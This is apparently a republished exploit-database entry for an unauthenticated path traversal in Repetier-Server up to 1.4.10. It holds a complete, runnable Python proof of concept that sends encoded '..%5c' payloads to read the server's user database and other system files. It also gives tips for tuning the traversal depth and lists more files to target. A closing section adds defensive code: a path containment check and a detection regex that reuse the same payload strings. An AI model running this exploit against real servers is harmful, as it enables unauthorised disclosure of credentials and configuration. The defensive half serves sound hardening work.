Repetier-Server <= 1.4.10 - Unauthenticated Path Traversal / Local File Inclusion
Repetier-Server <= 1.4.10 contains an unauthenticated path traversal / local file inclusion vulnerability (CVE-2026-26335), rated CVSS 9.8 (Critical). An attacker can exploit it to read arbitrary files from the server, leading to disclosure of sensitive data such as the user database. The published PoC targets default Windows installations, which are exploitable without any authentication in the default configuration.

2026-02-19 21:05:12  Author: cxsecurity.com


#!/usr/bin/env python3
# Exploit Title: Repetier-Server <= 1.4.10 - Unauthenticated Path Traversal / Local File Inclusion
# Exploit Author: Mohammed Idrees Banyamer
# Vendor Homepage: https://www.repetier.com/
# Version: <= 1.4.10
# Tested on: Windows 10 / Windows Server 2019 (Repetier-Server default install)
# CVE: CVE-2026-26335
# Advisory: https://cybir.com/2023/cve/poc-repetier-server-140/ (related research)
# CVSS: 9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

import argparse
from urllib.parse import urljoin

import requests
import urllib3

# The PoC is sent with verify=False; silence the resulting TLS warning noise.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def generate_traversal(depth: int = 15) -> str:
    # "..%5c" is a URL-encoded "..\": the server decodes it and Windows accepts
    # the backslash as a directory separator, so filters that only look for
    # "../" are bypassed. Surplus ".." segments beyond the real directory
    # depth are harmless (they stop at the drive root), so depth is over-estimated.
    return "..%5c" * depth


def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool:
    traversal = generate_traversal(traversal_depth)
    # Two request shapes: traversal in the URL path, and traversal in the
    # "file" parameter of base/connectionLost.php.
    payloads = [
        f"views{traversal}{file_path}/base/connectionLost.php",
        f"base/connectionLost.php?file={traversal}{file_path}",
    ]
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    print(f"[*] Traversal depth: {traversal_depth}")
    for payload in payloads:
        exploit_url = urljoin(target_url.rstrip("/") + "/", payload)
        try:
            print(f"  → Trying: {exploit_url}")
            r = requests.get(exploit_url, timeout=timeout, verify=False)
            # Heuristic only: a 200 with a non-trivial body is treated as a hit;
            # the preview is printed so the operator can confirm by eye.
            if r.status_code == 200 and len(r.content) > 60:
                sample = r.text[:500].replace("\n", " ").strip()
                print(f"[+] LIKELY SUCCESS (status {r.status_code}, {len(r.content)} bytes)")
                print(f"    Preview:\n    {sample}...")
                return True
            else:
                print(f"  → Failed (status {r.status_code}, size {len(r.content)})")
        except requests.RequestException as e:
            print(f"  → Error: {e}")
    return False


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-26335 PoC - Repetier-Server Path Traversal / LFI"
    )
    parser.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)")
    parser.add_argument("--file", default="ProgramData\\Repetier-Server\\database\\user.sql",
                        help="File path to read (use Windows \\ separator)")
    parser.add_argument("--depth", type=int, default=15, help="Traversal depth")
    parser.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini")
    args = parser.parse_args()

    if args.test:
        args.file = "Windows\\win.ini"
        print("[i] Running test mode → targeting Windows\\win.ini")

    # Backslashes in the requested path are sent percent-encoded, like the traversal.
    file_path = args.file.replace("\\", "%5c")

    print("=" * 70)
    print("CVE-2026-26335 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal")
    print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!")
    print("=" * 70, "\n")

    success = attempt_read(args.target, file_path, args.depth)
    if not success:
        print("\n[!] Exploitation attempt failed.")
        print("Suggestions:")
        print("  • Increase --depth (try 18–30)")
        print("  • Verify target is running Repetier-Server <=1.4.10")
        print("  • Try alternative interesting files:")
        print("    - ProgramData%5cRepetier-Server%5cconfig.xml")
        print("    - Windows%5csystem32%5cdrivers%5cetc%5chosts")


if __name__ == "__main__":
    main()
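The PoC above works because of two things a naive filter misses: the traversal is spelled with a percent-encoded backslash ("..%5c"), which Windows treats as a directory separator just like "/", and it is repeated well past the real directory depth, which costs nothing because surplus ".." segments stop at the root. The following is an added example, not Repetier-Server code and not from the exploit author, showing the check a file-serving handler or reverse proxy should apply instead of string-matching "../": decode until the string stops changing, normalise both separators, resolve the path, and test containment against the web root. It also includes a detection rule over constructed request lines. The web root path, the log lines and all function names are assumptions for illustration; the payload strings are built exactly as the PoC builds them.

```python
import re
from pathlib import Path
from typing import List, Optional
from urllib.parse import unquote

# Traversal segment in the spellings the PoC can produce: "../", "..\", and the
# still-encoded "..%5c" / "..%2f" (case-insensitive) when scanning raw URLs.
TRAVERSAL_RE = re.compile(r"\.\.(?:[\\/]|%2f|%5c)", re.IGNORECASE)


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so a
    double-encoded "..%255c" is reduced to "..\\" before any check runs."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def safe_resolve(webroot: str, requested: str) -> Optional[str]:
    """Return the absolute file path to serve, or None if the request escapes
    webroot. Both separators are normalised because Windows accepts "\\" as
    well as "/", and containment is tested on the resolved path rather than
    by looking for "../" in the string."""
    decoded = fully_decode(requested).replace("\\", "/")
    if "\x00" in decoded:            # NUL truncation has no place in a path
        return None
    root = Path(webroot).resolve()
    candidate = (root / decoded.lstrip("/")).resolve()
    try:
        candidate.relative_to(root)  # raises ValueError if outside root
    except ValueError:
        return None
    return str(candidate)


def looks_like_traversal(request_line: str) -> bool:
    """Detection rule for a proxy or log pipeline: flag a traversal segment in
    the raw request line or in its fully decoded form."""
    return bool(TRAVERSAL_RE.search(request_line)
                or TRAVERSAL_RE.search(fully_decode(request_line)))


def flagged(lines: List[str]) -> List[str]:
    return [line for line in lines if looks_like_traversal(line)]


# Assumed web root for the demonstration (not Repetier-Server's real layout).
WEBROOT = "/opt/repetier/www"

# The same strings the PoC builds with depth 15 and its default target file.
POC_TRAVERSAL = "..%5c" * 15
POC_FILE = "ProgramData%5cRepetier-Server%5cdatabase%5cuser.sql"
POC_PAYLOADS = [
    f"views{POC_TRAVERSAL}{POC_FILE}/base/connectionLost.php",
    f"{POC_TRAVERSAL}{POC_FILE}",  # value of ?file= in the PoC's second variant
]

# Constructed access-log request lines (not captured traffic): one benign
# request, one PoC request, one double-encoded variant a raw-string match misses.
SAMPLE_LOG = [
    "GET /base/connectionLost.php HTTP/1.1",
    "GET /views" + POC_TRAVERSAL + "Windows%5cwin.ini/base/connectionLost.php HTTP/1.1",
    "GET /base/connectionLost.php?file=" + "..%255c" * 4 + "Windows%5cwin.ini HTTP/1.1",
]


def demo() -> dict:
    """Run both checks over the constructed inputs and return the verdicts."""
    return {
        "benign_allowed": safe_resolve(WEBROOT, "base/connectionLost.php"),
        "poc_rejected": [safe_resolve(WEBROOT, p) is None for p in POC_PAYLOADS],
        "flagged_log_lines": flagged(SAMPLE_LOG),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

Run it with no arguments: the benign request resolves to a file under the assumed web root, both PoC payloads are rejected by the containment check, and two of the three constructed log lines are flagged, including the double-encoded one that only matches after decoding. The containment test is on the resolved path, so it also holds when the traversal depth is far larger than the real depth, which is exactly the case the PoC's --depth option exploits.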

Source: https://cxsecurity.com/issue/WLB-2026020018
For copyright concerns, contact: admin#unsafe.sh